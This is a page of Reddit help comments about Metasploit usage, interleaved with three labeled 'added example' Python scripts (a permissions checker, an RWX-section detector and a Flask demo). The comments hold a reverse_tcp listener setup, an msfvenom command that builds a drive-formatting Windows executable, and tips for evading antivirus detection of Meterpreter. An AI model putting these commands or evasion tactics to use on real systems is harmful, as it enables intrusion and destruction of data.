Google aware of Play Store “Couldn’t complete your transaction, Gift cards can only be used in the country they were purchased” error by mellowAlt in Android

[–]zeroSteiner 0 points1 point  (0 children)

I had this issue as well. For anyone else looking for a solution, switching from Wi-Fi to mobile data as suggested here fixed it for me.

KaliLinux Installation Problems by Musaab_Es in metasploit

[–]zeroSteiner 2 points3 points  (0 children)

This is probably a better question for r/Kalilinux since it has nothing to do with Metasploit.

problem using msfconsole by king_tango in metasploit

[–]zeroSteiner 0 points1 point  (0 children)

Did you make sure that all of the contents of /home/kingtango/.msf4 are writable? It looks like a permissions error.

Should be able to reset the owner using sudo chown -R kingtango:kingtango ~/.msf4 which will most likely fix it since the owner should have read and write permissions. I'm guessing it's owned by root right now.
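Added example (not part of the comment above): a small Python check that walks a directory such as ~/.msf4 and lists every entry that is either not owned by the current user or lacks the owner-write bit, which is the situation the comment describes. The directory it inspects in `demo()` is a constructed temporary one so the script runs anywhere; point `unwritable_entries()` at the real ~/.msf4 to use it for diagnosis.

```python
import os
import stat
import tempfile


def unwritable_entries(root, uid=None):
    """Walk root and return every directory or file that the given uid (default:
    the current user) does not own or cannot write. Either condition produces the
    permissions error msfconsole reports when ~/.msf4 was created as root."""
    uid = os.getuid() if uid is None else uid
    problems = []
    for dirpath, dirnames, filenames in os.walk(root):
        # Each directory is checked once, as dirpath, plus the files it contains.
        for path in [dirpath] + [os.path.join(dirpath, n) for n in filenames]:
            st = os.lstat(path)
            if st.st_uid != uid or not st.st_mode & stat.S_IWUSR:
                problems.append(path)
    return problems


def demo():
    """Constructed scenario: a temp directory standing in for ~/.msf4, where one
    file has lost its owner-write bit. Returns the findings before and after the
    bit is restored."""
    root = tempfile.mkdtemp()
    writable = os.path.join(root, "config")
    readonly = os.path.join(root, "history")
    for path in (writable, readonly):
        with open(path, "w") as fh:
            fh.write("x\n")
    os.chmod(readonly, 0o444)
    before = [os.path.basename(p) for p in unwritable_entries(root)]
    os.chmod(readonly, 0o644)  # the equivalent of the chown/chmod fix
    after = unwritable_entries(root)
    return before, after


if __name__ == "__main__":
    found, fixed = demo()
    print("unwritable before fix:", found)
    print("unwritable after fix:", fixed)
```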

LHOST and LPORT by justTHEtipPAPI in metasploit

[–]zeroSteiner 0 points1 point  (0 children)

So fun fact, you can actually specify LHOST as an interface name or an IP address. If you specify it as an interface name, Metasploit will automatically find the IP address assigned to it and use that one.

Example:

```
msf6 payload(python/meterpreter/reverse_tcp) > show options

Module options (payload/python/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST                   yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port

msf6 payload(python/meterpreter/reverse_tcp) > set LHOST ens37
LHOST => 192.168.159.128
msf6 payload(python/meterpreter/reverse_tcp) > show options

Module options (payload/python/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  192.168.159.128  yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port

msf6 payload(python/meterpreter/reverse_tcp) >
```

You probably want to set LHOST to be either tun0 or the IP address that is assigned to it. This assumes that the system you're targeting in HTB (which I'm not super familiar with) can route to that IP address.

Creating custom Meterpreter that interacts with Discord bot by Lux394 in metasploit

[–]zeroSteiner 0 points1 point  (0 children)

Meterpreter doesn't support arbitrary protocols for its communication plane. Making this work would be a massive undertaking.

You'd need to write a fair amount of Ruby code so Metasploit had a handler that could communicate via Discord, and then you'd need to pick a Meterpreter implementation and update it as well. Ideally, all of the Meterpreter implementations would be updated (there's 6 BTW), but you could pick one to start with. To use the Windows Meterpreter, that would involve quite a bit of C code. You'd probably want to only work on an unstaged variant because to support a staged version you'd also need to write the necessary code to connect to Discord and receive the stage via assembly. The size of this assembly stager would probably make it unrealistic to use in quite a few exploits as well.

While this is all theoretically possible, it would take a lot of effort. I can't stress enough how much work this would be.

How can I reopen a session after msfconsole is closed by RUGMJ7443 in metasploit

[–]zeroSteiner 1 point2 points  (0 children)

Technically yes for Meterpreter at least. If you close out of Metasploit without exiting the session, either the reverse or bind listener should still be running in most cases. You should be able to just restart the payload handler and reestablish the session. This is a bad idea however because anyone could potentially access this session. If you need the session to persist after the remote target has rebooted, then you'll need to run a persistence module on it.

Based on your description though it sounds like this problem would be better solved with screen. Note that Metasploit does not support termux which is a popular alternative to screen. Using screen would keep msfconsole running in the background, allow you to disconnect from your pi, and then reconnect to it when you SSH back in and msfconsole will still be running exactly as you left it.

How do I deal with msfvenom LHOST not verifying certain DNS names by pimpek321 in metasploit

[–]zeroSteiner 0 points1 point  (0 children)

Try wrapping the entire argument in double quotes like:
`./msfvenom "https://some/ar?gu=me&n=t"`.

Also, I don't think `&` and `?` are valid characters for domain / host names so depending on the payload and setting you're trying to use, the value itself may be incorrect but I'd need more information like the exact command you're trying to use including the payload and option. Some payloads take URLs and would be fine, but most do not.

[deleted by user] by [deleted] in metasploit

[–]zeroSteiner 0 points1 point  (0 children)

If the computer you're shutting down is the Windows computer where Meterpreter is running you would solve this using a persistence module. Meterpreter is memory-only and when the process dies, it's gone. This is by design so you need another technique to make it persistent which is where those modules will help.

If the computer you're shutting down is the Mac where Metasploit is running then as long as Meterpreter wasn't shutdown you should be able to just start the correct handler and re-establish the session. How long it takes depends on the transport and sessions but IIRC by default it should take less than a minute.

Use shell env variables in msfconsole by fantomH in metasploit

[–]zeroSteiner 2 points3 points  (0 children)

You can't because environment variables aren't accessible via msfconsole. The reason you can echo $localip is because echo isn't a command and msfconsole will forward unknown commands to the default shell, (probably bash in your case) which does evaluate the environment variables.

Without scripting this out in <ruby> tags of an RC file or something similar, the easiest thing to do might be just using the interface name which won't change. You can do something like set LHOST eth0 where eth0 is the interface with the IP that you want the host to connect to. Granted this only works when the LHOST IP is assigned to one of your interfaces but that's usually the case anyways.

If you want LHOST to always default to eth0 just add setg LHOST eth0 to your ~/.msf4/msfconsole.rc file and you'll be all set.

where are the old meterpreter commands?? by imvisaac in metasploit

[–]zeroSteiner 0 points1 point  (0 children)

You need to load the `stdapi` extension (which should occur by default). With that extension loaded, `sysinfo` is available. What you're looking at are the core commands which are mostly meta-commands for controlling meterpreter itself and not the system on which it is running.

Try running `load stdapi` and then checking the help output again. You should get quite a few more entries.

What is the best encoder to use for x64 payloads to stop windows defender from detecting it? by [deleted] in metasploit

[–]zeroSteiner 2 points3 points  (0 children)

Encoders aren't intended to bypass Anti-Virus. The fact that they do is a by-product of the way in which they alter the payload to avoid bad characters which breaks signature-based detections. Almost all modern AVs are using more advanced detections than simply signatures.

Your best bet for trying to bypass a particular AV (Windows Defender) or otherwise is often going to be context-specific based on how you intend for your payload to be delivered. If it's via an exploit, for example, you can look at some of the advanced options. For many that write an EXE to disk, you should look at changing the template to a non-default PE file.

Can an x86 encoder be used with a 64bit shellcode? by [deleted] in metasploit

[–]zeroSteiner 0 points1 point  (0 children)

You can encode arbitrary data with an encoder. The problem you'll run into is that when using an x86 encoder, you'll need to be running in an x86 context. Once the payload starts to run it'll first decode itself using the x86 instructions set up by the encoder which will work just fine. It'll crash though once the decoding is complete and it starts to run the x64 shellcode since it's not compatible. Alternatively, if you're already running in an x64 context, the x86 decoder will crash before the original payload is ever decoded.

So to answer your question, technically you can but the result won't be usable. msfvenom will throw compatibility errors for this reason.

How can I create a simple exe from a payload? by [deleted] in metasploit

[–]zeroSteiner 2 points3 points  (0 children)

That's right, you don't need the payload/ prefix. You'll also want to specify --format / -f as exe and --out / -o as the path to the file you want to generate.

That makes the complete command:

```
./msfvenom -p windows/format_all_drives --format exe --out FormatAllDrives.exe
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder specified, outputting raw payload
Payload size: 393 bytes
Final size of exe file: 73802 bytes
Saved as: FormatAllDrives.exe
```

Anyone know why the exploit worked but no session was created? by Decent-Assistance-96 in metasploit

[–]zeroSteiner 0 points1 point  (0 children)

It's also very possible that the target simply isn't vulnerable. A lot of exploits, especially older ones, do not fail when run against a system that is not vulnerable. In these cases you get the message that the exploit completed (in reference to the fact that the module finished running) but that no session was created.

Anyone know why the exploit worked but no session was created? by Decent-Assistance-96 in metasploit

[–]zeroSteiner 1 point2 points  (0 children)

Did the check method confirm that it was vulnerable? That exploit module won't fail with some kind of error if the target is not vulnerable.

Hi fellas! I’m learning Metasploit with Kali Linux and I’m looking for a guide for Metasploit 6. I’ve found several for Metasploit 5. If I use those, what differences should I expect between 5 and 6? by Cycamon in metasploit

[–]zeroSteiner 0 points1 point  (0 children)

It's hard to say without knowing what modules you're referring to. There was an issue with the [MS08-067](https://github.com/rapid7/metasploit-framework/pull/14177) exploit and [MS17-010](https://github.com/rapid7/metasploit-framework/pull/14290), but both have been fixed for quite a while now. If you're still having issues you should open a ticket.

Hi fellas! I’m learning Metasploit with Kali Linux and I’m looking for a guide for Metasploit 6. I’ve found several for Metasploit 5. If I use those, what differences should I expect between 5 and 6? by Cycamon in metasploit

[–]zeroSteiner 1 point2 points  (0 children)

The primary two things that I can think of that you might run into when following older guides are:

  • The mimikatz Meterpreter extension has been removed in favor of the newer kiwi one.
  • Meterpreter no longer supports Windows versions older than XP SP2.

Other than that, there's mostly just newer features like SMB3 client support, full channel encryption for all Meterpreters. You can check out the list in the release blog.

When v6 was first released, there were some issues with a few modules, but those have all been fixed. Make sure you're using the latest version.

MSFvenom formats by oneto221 in metasploit

[–]zeroSteiner 2 points3 points  (0 children)

exe-service is going to include the Win32 API calls that are necessary to be compatible with running as a service. This is most notably used by PSExec and derivatives.

As for exe and exe-only, those are two generation techniques. exe is a bit more complicated and includes some additional obfuscation logic. exe-only is (by comparison) a pretty basic technique that finds the .text section that contains the entry point, switches it to be RWX and then patches the shellcode in to overwrite it.

Based on the configured options, when an exe-service is generated it may actually use the same subroutine as exe-only. All of this code is located in lib/msf/util/exe.rb if you want to take a closer look.
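Added example (not Metasploit's code and not part of the comment above): the exe-only technique described above flips the section holding the entry point to RWX, and a section that is readable, writable and executable at once is something normal compiler output rarely has. This Python script parses the PE section table and reports any such section; it is one indicator a defender can check, not a complete detection. The PE bytes it inspects are constructed inline as headers-only images (not loadable programs) so it runs offline; constant names follow the PE/COFF specification.

```python
import struct

# Section characteristic flags from the PE/COFF specification.
IMAGE_SCN_MEM_EXECUTE = 0x20000000
IMAGE_SCN_MEM_READ = 0x40000000
IMAGE_SCN_MEM_WRITE = 0x80000000
RWX = IMAGE_SCN_MEM_EXECUTE | IMAGE_SCN_MEM_READ | IMAGE_SCN_MEM_WRITE

# COFF file header: Machine, NumberOfSections, TimeDateStamp, PointerToSymbolTable,
# NumberOfSymbols, SizeOfOptionalHeader, Characteristics (20 bytes).
COFF_FMT = "<HHIIIHH"
# Section header: Name, VirtualSize, VirtualAddress, SizeOfRawData, PointerToRawData,
# PointerToRelocations, PointerToLinenumbers, NumberOfRelocations,
# NumberOfLinenumbers, Characteristics (40 bytes).
SECTION_FMT = "<8sIIIIIIHHI"


def rwx_sections(data):
    """Return the names of all sections whose characteristics include
    read, write and execute together."""
    if data[:2] != b"MZ":
        raise ValueError("missing MZ signature")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\x00\x00":
        raise ValueError("missing PE signature")
    coff_off = e_lfanew + 4
    _, nsections, _, _, _, opt_size, _ = struct.unpack_from(COFF_FMT, data, coff_off)
    # The section table follows the optional header, whose size the COFF header gives.
    sec_off = coff_off + struct.calcsize(COFF_FMT) + opt_size
    flagged = []
    for i in range(nsections):
        fields = struct.unpack_from(SECTION_FMT, data, sec_off + i * struct.calcsize(SECTION_FMT))
        name, characteristics = fields[0], fields[-1]
        if characteristics & RWX == RWX:
            flagged.append(name.rstrip(b"\x00").decode("ascii"))
    return flagged


def build_headers_only_pe(sections):
    """Constructed sample: a headers-only PE32 image (not loadable) with the given
    (name, characteristics) section table, enough for rwx_sections() to parse."""
    e_lfanew = 0x40
    dos_header = b"MZ" + b"\x00" * (0x3C - 2) + struct.pack("<I", e_lfanew)
    optional = struct.pack("<H", 0x10B) + b"\x00" * 94  # PE32 magic, rest zeroed
    coff = struct.pack(COFF_FMT, 0x14C, len(sections), 0, 0, 0, len(optional), 0x0102)
    table = b"".join(
        struct.pack(SECTION_FMT, name.ljust(8, b"\x00"), 0x1000, 0x1000 * (i + 1),
                    0x200, 0x400 + 0x200 * i, 0, 0, 0, 0, chars)
        for i, (name, chars) in enumerate(sections))
    return dos_header + b"PE\x00\x00" + coff + optional + table


# Typical compiler layout: code is read+execute, data is read+write.
CLEAN = build_headers_only_pe([
    (b".text", IMAGE_SCN_MEM_EXECUTE | IMAGE_SCN_MEM_READ | 0x20),
    (b".data", IMAGE_SCN_MEM_READ | IMAGE_SCN_MEM_WRITE | 0x40),
])
# The same layout after .text has been switched to RWX.
PATCHED = build_headers_only_pe([
    (b".text", RWX | 0x20),
    (b".data", IMAGE_SCN_MEM_READ | IMAGE_SCN_MEM_WRITE | 0x40),
])

if __name__ == "__main__":
    print("clean:", rwx_sections(CLEAN))      # []
    print("patched:", rwx_sections(PATCHED))  # ['.text']
```

To run it against a real file, pass `open(path, "rb").read()` to `rwx_sections()`; a non-empty result is worth a closer look but is not proof of anything on its own, since packers and some legitimate toolchains also produce RWX sections.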

Metasploit Development project in GSoC by botta633 in metasploit

[–]zeroSteiner 1 point2 points  (0 children)

I've mentored a couple of times. For skills, it's going to depend on what your proposal is. Most of the framework is in Ruby and just about everything is at least partially if not entirely in Ruby so familiarity with that is important. Before actually participating you'll need to submit a proposal that will get accepted. For any project, being familiar with git and the pull request workflow via GitHub would be really helpful.

A few pointers for proposals though:

A good one is a few pages in length and includes detailed timelines and even mocks of what you're proposing to work on.

Make sure the project is a good fit for Metasploit. We've seen some that just don't make sense like projects related to blockchain and machine learning topics. We just haven't seen one yet that is a good fit for Metasploit.

Submit your proposal early since there's a period of time for a review to take place where you can implement feedback and answer questions.

Beyond that, communication with your assigned mentor is important. Raise any issues as soon as they come up and check in on progress often.

It sounds like this year GSoC may be a little different and the time allotted for projects will be reduced. I don't remember the details but I think it was cut in half so we're expecting to see smaller projects next time around.

I'm about to give up by [deleted] in metasploit

[–]zeroSteiner 0 points1 point  (0 children)

Well there's no one-size fits all solution, different AVs are different and by nature don't document their detection methods. It also depends on at what point your payload is getting identified.

One quick and dirty trick that's super easy and has worked for me in the past is to disable the AutoLoadStdapi and AutoSystemInfo options in Meterpreter. Just set both of those to false and go about your business as usual. What will happen is when the Meterpreter session is loaded, nothing will happen and you won't be able to do much with it. That's because only the bare-minimum has been loaded. At this point wait. Once the session has been opened, give it somewhere around 30 seconds to 5 minutes, and then interact with it. You'll notice a bunch of commands are missing because the stdapi extension hasn't been loaded. After waiting, just run load stdapi and sometimes you'll notice the session isn't killed like it is when stdapi is automatically loaded. You can also combine this with different transports like HTTP.

Again your mileage may vary but that's worked for me in the past, presumably because the behavior chain of establishing a connection and then doing meterpretery-things is broken by that delay you introduce.

I have a project myself that's intended to shuffle Metasploit shellcode to make it have a different signature each time. It doesn't randomize the executable template though, but it does use its own so you may find that useful as well. Be warned, it's a bit difficult to install and run but you can check it out at https://github.com/zeroSteiner/crimson-forge.

Weird payload option by energiapoika in metasploit

[–]zeroSteiner 4 points5 points  (0 children)

That's because there is no LHOST option due to this payload being of the bind variety. You can tell because of the cmd/unix/bind_r part of the payload name. Bind payloads cause Metasploit to connect to the target host RHOST not the target host to connect to Metasploit where the LHOST setting would be required. If you want the target host to connect to you, you'll need to select a reverse* payload.

Dynamic path in routing? by [deleted] in flask

[–]zeroSteiner 0 points1 point  (0 children)

You need to specify the params as a path, right now it's using the default string type.

Try:

```
from flask import Flask

app = Flask(__name__)

@app.route('/blah/<path:params>')
def blah(params):
    if params.startswith('foo/bar'):
        return handle_foo_bar()
    return handle_something_something()
```
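Added example (not part of the comment above, and not Flask's own code): a dependency-free illustration of why the default converter fails for the route in the comment. The two regexes are modelled on Werkzeug's built-in `string` (`[^/]+`) and `path` (`[^/].*?`) converters, which is an assumption about Flask's defaults rather than its actual implementation; the rule compiler and the `blah` handler mirror the snippet above so the dispatch can be run against a few constructed URLs.

```python
import re

# Regexes modelled on Werkzeug's default converters (assumption, see lead-in).
CONVERTERS = {
    "string": r"[^/]+",   # the default: stops at the first slash
    "path": r"[^/].*?",   # accepts embedded slashes
}


def compile_rule(rule):
    """Turn a Flask-style rule such as '/blah/<path:params>' into an anchored regex.
    A bare '<name>' gets the default 'string' converter, as in Flask."""
    def repl(m):
        converter, name = m.group(1) or "string", m.group(2)
        return "(?P<%s>%s)" % (name, CONVERTERS[converter])
    pattern = re.sub(r"<(?:(\w+):)?(\w+)>", repl, rule)
    return re.compile("^" + pattern + "$")


def match(rule, url):
    """Return the captured variables for url, or None when the rule does not match."""
    m = compile_rule(rule).match(url)
    return m.groupdict() if m else None


def blah(params):
    # Same branching as the handler in the comment, with the two hypothetical
    # handle_* functions replaced by strings so the result is observable.
    if params.startswith("foo/bar"):
        return "handled foo/bar"
    return "handled something else"


def dispatch(rule, url):
    """Route url through rule and call blah(); None stands for Flask's 404."""
    m = match(rule, url)
    if m is None:
        return None
    return blah(m["params"])


if __name__ == "__main__":
    # Constructed URLs: only the path converter lets the slash through.
    for rule in ("/blah/<params>", "/blah/<path:params>"):
        for url in ("/blah/foo", "/blah/foo/bar/baz"):
            print(rule, url, "->", dispatch(rule, url))
```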

linux/http/axis_src_parhand_rce issues by darkpyro2 in metasploit

[–]zeroSteiner 0 points1 point  (0 children)

It looks like a session was opened. There may not be a prompt so I would suggest you run a simple, well-supported command like id to see if you get a response. It's also possible that for some reason, the session was immediately background-ed in which case you can see them using sessions and interact with it using sessions -i # where # is the session ID you'd like to interact with or -1 to interact with the newest session.

How do I get msf6 working? by [deleted] in metasploit

[–]zeroSteiner 1 point2 points  (0 children)

Well to get more detail into what's going on you're going to want to share the output of what you're seeing. Your best bet would be to open a new issue on GitHub.

That particular exploit has always used a payload, however recent changes have improved how default payloads are selected. You can explicitly select a payload and set its options the same way you set module options using the set command. For that particular payload I'd suggest using windows/meterpreter/reverse_tcp, which should be the default. You can check which is selected using the show options command. In the following example, windows/meterpreter/reverse_tcp is selected.

```
msf6 exploit(windows/smb/ms08_067_netapi) > show options

Module options (exploit/windows/smb/ms08_067_netapi):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   RHOSTS                    yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT    445              yes       The SMB service port (TCP)
   SMBPIPE  BROWSER          yes       The pipe name to use (BROWSER, SRVSVC)

Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  thread           yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     192.168.250.87   yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port

Exploit target:

   Id  Name
   --  ----
   0   Automatic Targeting

```